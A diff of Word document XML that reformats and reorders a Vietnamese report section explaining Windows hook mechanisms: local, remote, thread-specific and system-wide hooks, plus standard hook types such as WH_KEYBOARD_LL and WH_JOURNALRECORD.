-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>2.1.1. Khái niệm hàm Hook</w:t>
+        <w:t>2.1.2. Các loại Hook</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Có nhiều loại hook được phân biệt dựa vào các sự kiện, thông điệp mà Hook procedure can thiệp vào</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Phân loại theo các mô hình</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Hook:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5279,34 +8261,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Trong Windows, khi chúng ta thực hiện các thao tác nhấp chuột, nhấn phím… thì hệ điều hành sẽ chuyển các sự kiện này thành các thông điệp (message) rồi đưa vào hàng đợi (queue) của hệ thống. Sau đó, các thông điệp được trao lại cho từng ứng dụng cụ thể để xử lý.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Hook là một cơ chế mà một ứng dụng có thể chặn các sự kiện, như các thông điệp, thao tác chuột, bàn phím. Hàm dùng để chặn một loại sự kiện riêng biệt được gọi là hook procedure/ Hook function (thủ tục hook / hàm hook) hoặc Filter Function (hàm lọc). Mỗi khi nhận được sự kiện, hook</w:t>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5322,97 +8277,23 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>procedure có thể thay đổi và thậm chí hủy bỏ các sự kiện đó.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>2.1.2. Các loại Hook</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Có nhiều loại hook được phân biệt dựa vào các sự kiện, thông điệp mà Hook procedure can thiệp vào</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Phân loại theo các mô hình</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Hook:</w:t>
+        <w:t>Local hook:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>là kỹ thuật Hook dùng để bẫy sự kiện ngay trong tiến trình cài đặt.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5432,39 +8313,15 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Local hook:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>là kỹ thuật Hook dùng để bẫy sự kiện ngay trong tiến trình cài đặt.</w:t>
+        <w:t>- Remote hook: là kỹ thuật Hook cho phép bẫy các sự kiện thuộc tiến trình của ứng dụng khác. Trong mô hình này lại tồn tại hai kiểu hook khác</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5484,15 +8341,23 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>- Remote hook: là kỹ thuật Hook cho phép bẫy các sự kiện thuộc tiến trình của ứng dụng khác. Trong mô hình này lại tồn tại hai kiểu hook khác</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Thread-specific: kiểu Hook này sẽ bẫy sự kiện của một luồng cụ thể.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5528,7 +8393,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Thread-specific: kiểu Hook này sẽ bẫy sự kiện của một luồng cụ thể.</w:t>
+        <w:t>System-wide: bẫy sự kiện của tất cả các luồng trong tất cả các tiến trình đang thi hành trong hệ thống.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5548,23 +8413,23 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>+</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>System-wide: bẫy sự kiện của tất cả các luồng trong tất cả các tiến trình đang thi hành trong hệ thống.</w:t>
+        <w:t xml:space="preserve">Phân loại </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>dựa vào các sự kiện, thông điệp mà Hook procedure can thiệp vào</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5584,23 +8449,31 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Phân loại </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>dựa vào các sự kiện, thông điệp mà Hook procedure can thiệp vào</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">WH_CALLWNDPROC </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>và</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WH_CALLWNDPROCRET: cho phép bạn theo dõi các thông điệp gởi đến các thủ tục cửa sổ (window procedure).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5628,23 +8501,32 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">WH_CALLWNDPROC </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>và</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WH_CALLWNDPROCRET: cho phép bạn theo dõi các thông điệp gởi đến các thủ tục cửa sổ (window procedure).</w:t>
+        <w:t>WH_CBT: hệ thống gọi thủ tục hook WH_CBT : trước khi activating, creating, destroying, minimizing, maximizing, moving, hoặc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sizing một cửa sổ; trước </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>khi hoàn thành một lệnh hệ thống, trước khi loại bỏ một sự kiện chuột hoặc bàn phím từ hàng đợi thông điệp hệ thống …</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5672,32 +8554,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>WH_CBT: hệ thống gọi thủ tục hook WH_CBT : trước khi activating, creating, destroying, minimizing, maximizing, moving, hoặc</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sizing một cửa sổ; trước </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>khi hoàn thành một lệnh hệ thống, trước khi loại bỏ một sự kiện chuột hoặc bàn phím từ hàng đợi thông điệp hệ thống …</w:t>
+        <w:t>WH_DEBUG: hệ thống gọi một thủ tục hook WH_DEBUG trước khi gọi một thủ tục hook kết hợp với bất kỳ hook khác trong hệ thống.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5725,7 +8582,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>WH_DEBUG: hệ thống gọi một thủ tục hook WH_DEBUG trước khi gọi một thủ tục hook kết hợp với bất kỳ hook khác trong hệ thống.</w:t>
+        <w:t>WH_FOREGROUNDIDLE: các hook WH_FOREGROUNDIDLE cho phép bạn thực hiện các tác vụ ưu tiên thấp trong thời gian tác vụ đó đang ở chế độ foreground idle.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5753,7 +8610,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>WH_FOREGROUNDIDLE: các hook WH_FOREGROUNDIDLE cho phép bạn thực hiện các tác vụ ưu tiên thấp trong thời gian tác vụ đó đang ở chế độ foreground idle.</w:t>
+        <w:t>WH_GETMESSAGE: hook WH_GETMESSAGE cho phép một ứng dụng theo dõi các thông điệptrả về bởi hàm GetMessage hoặc PeekMessage.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5781,7 +8638,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>WH_GETMESSAGE: hook WH_GETMESSAGE cho phép một ứng dụng theo dõi các thông điệptrả về bởi hàm GetMessage hoặc PeekMessage.</w:t>
+        <w:t>WH_JOURNALPLAYBACK: các hook WH_JOURNALPLAYBACK cho phép một ứng dụng chèn thêm các thông điệp vào hàng đợi thông điệp hệ thống.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5809,7 +8666,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>WH_JOURNALPLAYBACK: các hook WH_JOURNALPLAYBACK cho phép một ứng dụng chèn thêm các thông điệp vào hàng đợi thông điệp hệ thống.</w:t>
+        <w:t>WH_JOURNALRECORD: các hook WH_JOURNALRECORD cho phép bạn giám sát và ghi lại các sự kiện đầu vào.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5837,7 +8694,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>WH_JOURNALRECORD: các hook WH_JOURNALRECORD cho phép bạn giám sát và ghi lại các sự kiện đầu vào.</w:t>
+        <w:t>WH_KEYBOARD_LL: Các hook WH_KEYBOARD_LL cho phép bạn theo dõi các sự kiện bàn phím trong hàng đợi ứng dụng.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5865,7 +8722,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>WH_KEYBOARD_LL: Các hook WH_KEYBOARD_LL cho phép bạn theo dõi các sự kiện bàn phím trong hàng đợi ứng dụng.</w:t>
+        <w:t>WH_KEYBOARD: hook WH_KEYBOARD cho phép một ứng dụng theo dõi lưu lượng truy cập thông điệp của thông điệp WM_KEYDOWN và WM_KEYUP được trả về bởi hàm GetMessage hoặc PeekMessage.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5893,7 +8750,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>WH_KEYBOARD: hook WH_KEYBOARD cho phép một ứng dụng theo dõi lưu lượng truy cập thông điệp của thông điệp WM_KEYDOWN và WM_KEYUP được trả về bởi hàm GetMessage hoặc PeekMessage.</w:t>
+        <w:t>WH_MOUSE_LL: các hook WH_MOUSE_LL cho phép bạn theo dõi các sự kiện chuột trong hàng đợi ứng dụng.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5921,7 +8778,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>WH_MOUSE_LL: các hook WH_MOUSE_LL cho phép bạn theo dõi các sự kiện chuột trong hàng đợi ứng dụng.</w:t>
+        <w:t>WH_MOUSE: các hook WH_MOUSE cho phép bạn theo dõi các thông điệp chuột được trả về bởi hàm GetMessage hoặc PeekMessage.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5949,7 +8806,23 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>WH_MOUSE: các hook WH_MOUSE cho phép bạn theo dõi các thông điệp chuột được trả về bởi hàm GetMessage hoặc PeekMessage.</w:t>
+        <w:t xml:space="preserve">WH_MSGFILTER </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>và</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WH_SYSMSGFILTER: cho phép theo dõi chính các thông điệp được xử lý bởi menu, scrollbar, dialog…</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5959,57 +8832,17 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">WH_MSGFILTER </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>và</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WH_SYSMSGFILTER: cho phép theo dõi chính các thông điệp được xử lý bởi menu, scrollbar, dialog…</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -6135,13 +8968,21 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -6218,25 +9059,37 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:bookmarkStart w:id="25" w:name="_Toc57761772"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -6245,6 +9098,9 @@
